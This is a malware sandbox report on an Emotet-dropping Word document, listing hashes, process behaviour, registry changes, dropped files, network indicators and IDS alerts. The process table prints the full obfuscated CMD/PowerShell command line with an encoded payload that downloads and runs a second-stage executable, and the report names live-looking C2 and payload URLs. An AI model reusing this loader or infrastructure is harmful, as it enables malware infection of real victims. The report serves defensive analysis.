analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FOG96316-9.doc

Full analysis: https://app.any.run/tasks/a258f08c-1173-4b2f-a89a-f987fe6dabe5
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 08:19:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Anna-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 03:58:00 2018, Last Saved Time/Date: Thu Nov 8 03:58:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

ADFEFB28E5AED2FF9CF588AC14EED9D0

SHA1:

FC479A5318CCD7AC421F9F848653CFB1AFDF9887

SHA256:

BE645B0D9B086CD962BB27333A1BCB3379D3739DC9E5E9F3F8E8F1A97BA792FB

SSDEEP:

768:L9EVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o92pX6ZCrrjIu:L9Eocn1kp59gxBK85fBt+a9ej

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3360)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3360)
    • Application was dropped or rewritten from another process

      • 232.exe (PID: 3964)
      • 232.exe (PID: 3852)
      • lpiograd.exe (PID: 2296)
      • lpiograd.exe (PID: 2264)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3880)
    • EMOTET was detected

      • lpiograd.exe (PID: 2264)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 2264)
    • Connects to CnC server

      • lpiograd.exe (PID: 2264)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 2256)
    • Creates files in the user directory

      • powershell.exe (PID: 3880)
    • Executable content was dropped or overwritten

      • 232.exe (PID: 3964)
      • powershell.exe (PID: 3880)
    • Starts itself from another location

      • 232.exe (PID: 3964)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3360)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3360)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 03:58:00
CreateDate: 2018:11:08 03:58:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Anna-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
4
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 232.exe no specs 232.exe lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
3360"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FOG96316-9.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2256CMD C:\wIndowS\sySTem32\CMD.ExE /C "SeT FYB=^& ((Gv '*mDr*').nAme[3,11,2]-joIN'') ( NeW-oBJecT io.StrEAMReAder((NeW-oBJecT SysTEm.iO.CoMprESSiOn.DEfLAtestrEAM( [sySTeM.IO.mEMORysTrEAm] [SysTEm.conveRt]::FrOMBASE64STrinG( 'TZBda8IwGIX/Si8CUZwpc4OhoSDq5vxAhLk5YTdJ+jbNTBPXxsYi/vdV3cDb8xweDgf9iE1kwLct/wbhggU4sgY+1AqMo2j2MY5w6tyuF4bcHmwilZQaCiJsFq6Kp+1g3d3I/l9DsJxbwysHFy4XJSzL4b644aqQ7Aq9y6v1/B9574l03uY6ZoLFkFXEA08Vv6qmw/dDOug839ZZZS2HeC+YU9Yw7fJ94YgyYf44SzYuuZ9+YvK208o1cB83KcpWyyAKcOehgymyk3mEwJQ9B9muhb9w68xbmMABME1sDkykDTR+HQXKBOcjmsd68RHVh5GR9UZbFr8oDZfOXXAWNunElHYL7UktvSSU154tPdUbRXo8nX4B') , [IO.comPResSiOn.COmpRessionmOde]::dECOmpReSs ) ) ,[SYsTEm.tEXT.ENCoDiNG]::AScII)).reAdTOeNd() && POweRsheLL sEt-ITEM ( 'va' + 'Riab'+'l' + 'e:l9eS' + '2' ) ( [TYPe](\"{1}{2}{0}\" -F'ronMent','EN','vI' ) ) ; ( (Gci ( 'Va' + 'RiAb'+'l' + 'e:L9ES' + '2') ).VALUE::(\"{2}{0}{1}{4}{3}\" -f 'ETENV','IRoNmENtV','G','ABLE','ARI' ).Invoke('fYB',(\"{0}{2}{1}\"-f 'pRo','s','cEs' ) )) ^| . ( ( ^& ('Gv') ( \"{0}{1}\"-f '*MD','r*' )).\"N`AMe\"[3,11,2]-jOiN'' )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3880POweRsheLL sEt-ITEM ( 'va' + 'Riab'+'l' + 'e:l9eS' + '2' ) ( [TYPe](\"{1}{2}{0}\" -F'ronMent','EN','vI' ) ) ; ( (Gci ( 'Va' + 'RiAb'+'l' + 'e:L9ES' + '2') ).VALUE::(\"{2}{0}{1}{4}{3}\" -f 'ETENV','IRoNmENtV','G','ABLE','ARI' ).Invoke('fYB',(\"{0}{2}{1}\"-f 'pRo','s','cEs' ) )) | . ( ( & ('Gv') ( \"{0}{1}\"-f '*MD','r*' )).\"N`AMe\"[3,11,2]-jOiN'' )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3852"C:\Users\admin\AppData\Local\Temp\232.exe" C:\Users\admin\AppData\Local\Temp\232.exepowershell.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
3964"C:\Users\admin\AppData\Local\Temp\232.exe"C:\Users\admin\AppData\Local\Temp\232.exe
232.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
2296"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe232.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
2264"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Version:
2
Total events
1 677
Read events
1 262
Write events
410
Delete events
5

Modification events

(PID) Process:(3360) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:6ye
Value:
36796500200D0000010000000000000000000000
(PID) Process:(3360) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3360) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3360) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1298661391
(PID) Process:(3360) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661504
(PID) Process:(3360) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661505
(PID) Process:(3360) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
200D0000BAE434D53B77D40100000000
(PID) Process:(3360) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:}ze
Value:
7D7A6500200D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3360) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:}ze
Value:
7D7A6500200D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3360) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3360WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9D16.tmp.cvr
MD5:
SHA256:
3880powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9PXWP5750JYNCBUIJ3WB.temp
MD5:
SHA256:
3360WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$G96316-9.docpgc
MD5:F9CA2F534499366960A0BF15CCF0A4B9
SHA256:DB5F1FE3F651B114432A3B69157247F9B5E91A88F4CC25353B2DA9F8535BEA60
3880powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3964232.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:63287FA5A786B27EAD904CF0B51351A4
SHA256:64BB87460F4F11717891F4598F20BF4913F70A0AE2E71D71C69F37193A65AD6D
3880powershell.exeC:\Users\admin\AppData\Local\Temp\232.exeexecutable
MD5:63287FA5A786B27EAD904CF0B51351A4
SHA256:64BB87460F4F11717891F4598F20BF4913F70A0AE2E71D71C69F37193A65AD6D
3360WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:11DED0D8BBA3F810DECC0D504DB0ADD3
SHA256:595A99C1AE5BFC290647BC293DFFB43CCAD089D6FEA96D3D5C03EDA729FE8DE3
3880powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da89f.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2264
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
148 b
malicious
2264
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/whoami.php
US
text
15 b
malicious
2264
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
714 Kb
malicious
3880
powershell.exe
GET
200
50.62.102.1:80
http://boxofgiggles.com/Ts7kBW9Yg/
US
executable
132 Kb
malicious
3880
powershell.exe
GET
301
50.62.102.1:80
http://boxofgiggles.com/Ts7kBW9Yg
US
html
308 b
malicious
2264
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/
US
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2264
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious
2264
lpiograd.exe
47.157.181.81:443
Frontier Communications of America, Inc.
US
malicious
3880
powershell.exe
50.62.102.1:80
boxofgiggles.com
GoDaddy.com, LLC
US
malicious

DNS requests

Domain
IP
Reputation
boxofgiggles.com
  • 50.62.102.1
malicious

Threats

PID
Process
Class
Message
3880
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3880
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3880
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3880
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2264
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
2264
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3 ETPRO signatures available at the full report
No debug info